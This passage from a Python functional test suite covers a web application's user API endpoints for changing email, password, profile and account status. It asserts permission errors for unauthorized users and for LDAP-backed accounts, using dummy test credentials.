"/api/v2/users/{}/email".format(user_id), params=params, status=400
)
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_EMAIL_MODIFICATION_UNALLOWED
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
assert res["auth_type"] == "ldap"
def test_api__set_user_password__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password=None,
auth_type=AuthType.LDAP,
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
user = uapi.get_one(user_id)
assert not user.validate_password("mynewpassword")
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "admin@admin.admin",
}
res = self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=400
)
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_PASSWORD_MODIFICATION_UNALLOWED
# Check After
dbsession = get_tm_session(self.session_factory, transaction.manager)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert not user.validate_password("mynewpassword")
class TestSetEmailEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/email
"""
fixtures = [BaseFixture]
def test_api__set_user_email__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "admin@admin.admin"}
self.testapp.put_json("/api/v2/users/{}/email".format(user_id), params=params, status=200)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "mysuperemail@email.fr"
def test_api__set_user_email__err_400__admin_same_email(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "admin@admin.admin", "loggedin_user_password": "admin@admin.admin"}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=400
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.EMAIL_ALREADY_EXIST_IN_DB
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
def test_api__set_user_email__err_403__admin_wrong_password(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "badpassword"}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.WRONG_USER_PASSWORD
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
def test_api__set_user_email__err_400__admin_string_is_not_email(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "thatisnotandemail", "loggedin_user_password": "admin@admin.admin"}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=400
)
# TODO - G.M - 2018-09-10 - Handled by marshmallow schema
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.GENERIC_SCHEMA_VALIDATION_ERROR
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
def test_api__set_user_email__ok_200__user_itself(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
self.testapp.put_json("/api/v2/users/{}/email".format(user_id), params=params, status=200)
self.testapp.authorization = ("Basic", ("mysuperemail@email.fr", "password"))
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "mysuperemail@email.fr"
def test_api__set_user_email__err_403__other_normal_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetPasswordEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/password
"""
fixtures = [BaseFixture]
def test_api__set_user_password__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "admin@admin.admin",
}
self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=204
)
# Check After
dbsession = get_tm_session(self.session_factory, transaction.manager)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert not user.validate_password("password")
assert user.validate_password("mynewpassword")
def test_api__set_user_password__err_403__admin_wrong_password(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "wrongpassword",
}
res = self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.WRONG_USER_PASSWORD
dbsession = get_tm_session(self.session_factory, transaction.manager)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
# Check After
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
def test_api__set_user_password__err_400__admin_passwords_do_not_match(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
assert not user.validate_password("mynewpassword2")
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword2",
"loggedin_user_password": "admin@admin.admin",
}
res = self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=400
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.PASSWORD_DO_NOT_MATCH
# Check After
dbsession = get_tm_session(self.session_factory, transaction.manager)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
assert not user.validate_password("mynewpassword2")
def test_api__set_user_password__ok_200__user_itself(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# check before
user = uapi.get_one(user_id)
assert user.validate_password("password")
assert not user.validate_password("mynewpassword")
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "password",
}
self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=204
)
# Check After
dbsession = get_tm_session(self.session_factory, transaction.manager)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert not user.validate_password("password")
assert user.validate_password("mynewpassword")
def test_api__set_user_email__err_403__other_normal_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
lang="fr",
timezone="Europe/Paris",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "password"}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserInfoEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}
"""
fixtures = [BaseFixture]
def test_api__set_user_info__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["public_name"] == "bob"
assert res["timezone"] == "Europe/Paris"
assert res["lang"] == "fr"
# Set params
params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=200)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["public_name"] == "updated"
assert res["timezone"] == "Europe/London"
assert res["lang"] == "en"
def test_api__set_user_info__ok_200__user_itself(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["public_name"] == "bob"
assert res["timezone"] == "Europe/Paris"
assert res["lang"] == "fr"
# Set params
params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=200)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["public_name"] == "updated"
assert res["timezone"] == "Europe/London"
assert res["lang"] == "en"
def test_api__set_user_info__err_403__other_normal_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
# Set params
params = {"public_name": "updated", "timezone": "Europe/London", "lang": "en"}
res = self.testapp.put_json("/api/v2/users/{}".format(user_id), params=params, status=403)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserProfileEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/profile
"""
fixtures = [BaseFixture]
def test_api__set_user_profile__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["profile"] == "users"
# Set params
params = {"profile": "administrators"}
self.testapp.put_json("/api/v2/users/{}/profile".format(user_id), params=params, status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["profile"] == "administrators"
def test_api__set_user_profile__err_400__admin_itself(self):
"""
Trying to set is own profile as user with admin right.
Return 400 because of "not allow to set own profile check"
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200)
res = res.json_body
assert res["user_id"] == admin.user_id
assert res["profile"] == "administrators"
# Set params
params = {"profile": "users"}
res = self.testapp.put_json(
"/api/v2/users/{}/profile".format(admin.user_id), params=params, status=400
)
assert res.json_body["code"] == ErrorCode.USER_CANT_CHANGE_IS_OWN_PROFILE
# Check After
res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200)
res = res.json_body
assert res["user_id"] == admin.user_id
assert res["profile"] == "administrators"
def test_api__set_user_profile__err_403__other_normal_user(self):
"""
Set user profile of user normal user as normal user
Return 403 error because of no right to do this as simple user
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
# Set params
params = {"profile": "administrators"}
res = self.testapp.put_json(
"/api/v2/users/{}/profile".format(user_id), params=params, status=403
)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestSetUserEnableDisableEndpoints(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/enabled
and PUT /api/v2/users/{user_id}/disabled
"""
fixtures = [BaseFixture]
def test_api_enable_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.disable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is False
self.testapp.put_json("/api/v2/users/{}/enabled".format(user_id), status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
def test_api_disable_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=204)
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is False
def test_api_disable_user__err_400__cant_disable_myself_admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=400)
assert res.json_body["code"] == ErrorCode.USER_CANT_DISABLE_HIMSELF
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
def test_api_enable_user__err_403__other_account(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.disable(test_user, do_save=True)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json("/api/v2/users/{}/enabled".format(user_id), status=403)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_disable_user__err_403__other_account(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="test2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=403)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_disable_user__err_403__cant_disable_myself_user(self):
"""
Trying to disable himself as simple user, raise 403 because no
right to disable anyone as simple user. (check of right is before
self-disable not allowed_check).
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.enable(test_user, do_save=True)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
res = self.testapp.put_json("/api/v2/users/{}/disabled".format(user_id), status=403)
assert res.json_body
assert "code" in res.json_body
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
# Check After
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["is_active"] is True
class TestUserEnpointsLDAPAuth(FunctionalTest):
config_section = "functional_ldap_test"
@pytest.mark.ldap
def test_api_set_user_password__err__400__setting_password_unallowed_for_ldap_user(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
res = self.testapp.get("/api/v2/auth/whoami", status=200)
user_id = res.json_body["user_id"]
# Set password
params = {
"new_password": "mynewpassword",
"new_password2": "mynewpassword",
"loggedin_user_password": "professor",
}
res = self.testapp.put_json(
"/api/v2/users/{}/password".format(user_id), params=params, status=400
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_PASSWORD_MODIFICATION_UNALLOWED
@pytest.mark.ldap
def test_api_set_user_email__err__400__setting_email_unallowed_for_ldap_user(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
res = self.testapp.get("/api/v2/auth/whoami", status=200)
user_id = res.json_body["user_id"]
# Set password
params = {
"email": "hubertnewemail@planetexpress.com",
"loggedin_user_password": "professor",
}
res = self.testapp.put_json(
"/api/v2/users/{}/email".format(user_id), params=params, status=400
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.EXTERNAL_AUTH_USER_EMAIL_MODIFICATION_UNALLOWED
@pytest.mark.ldap
def test_api__create_user__ok_200__full_admin(self):
self.testapp.authorization = ("Basic", ("hubert@planetexpress.com", "professor"))
self.testapp.get("/api/v2/auth/whoami", status=200)
api = UserApi(current_user=None, session=self.session, config=self.app_config)
user = api.get_one_by_email("hubert@planetexpress.com")
gapi = GroupApi(session=self.session, config=self.app_config, current_user=user)
api.update(
user, auth_type=user.auth_type, groups=[gapi.get_one_with_name("administrators")]
)
api.save(user)
transaction.commit()
params = {
"email": "test@test.test",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"lang": "fr",
"public_name": "test user",
"email_notification": False,
}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["auth_type"] == "unknown"
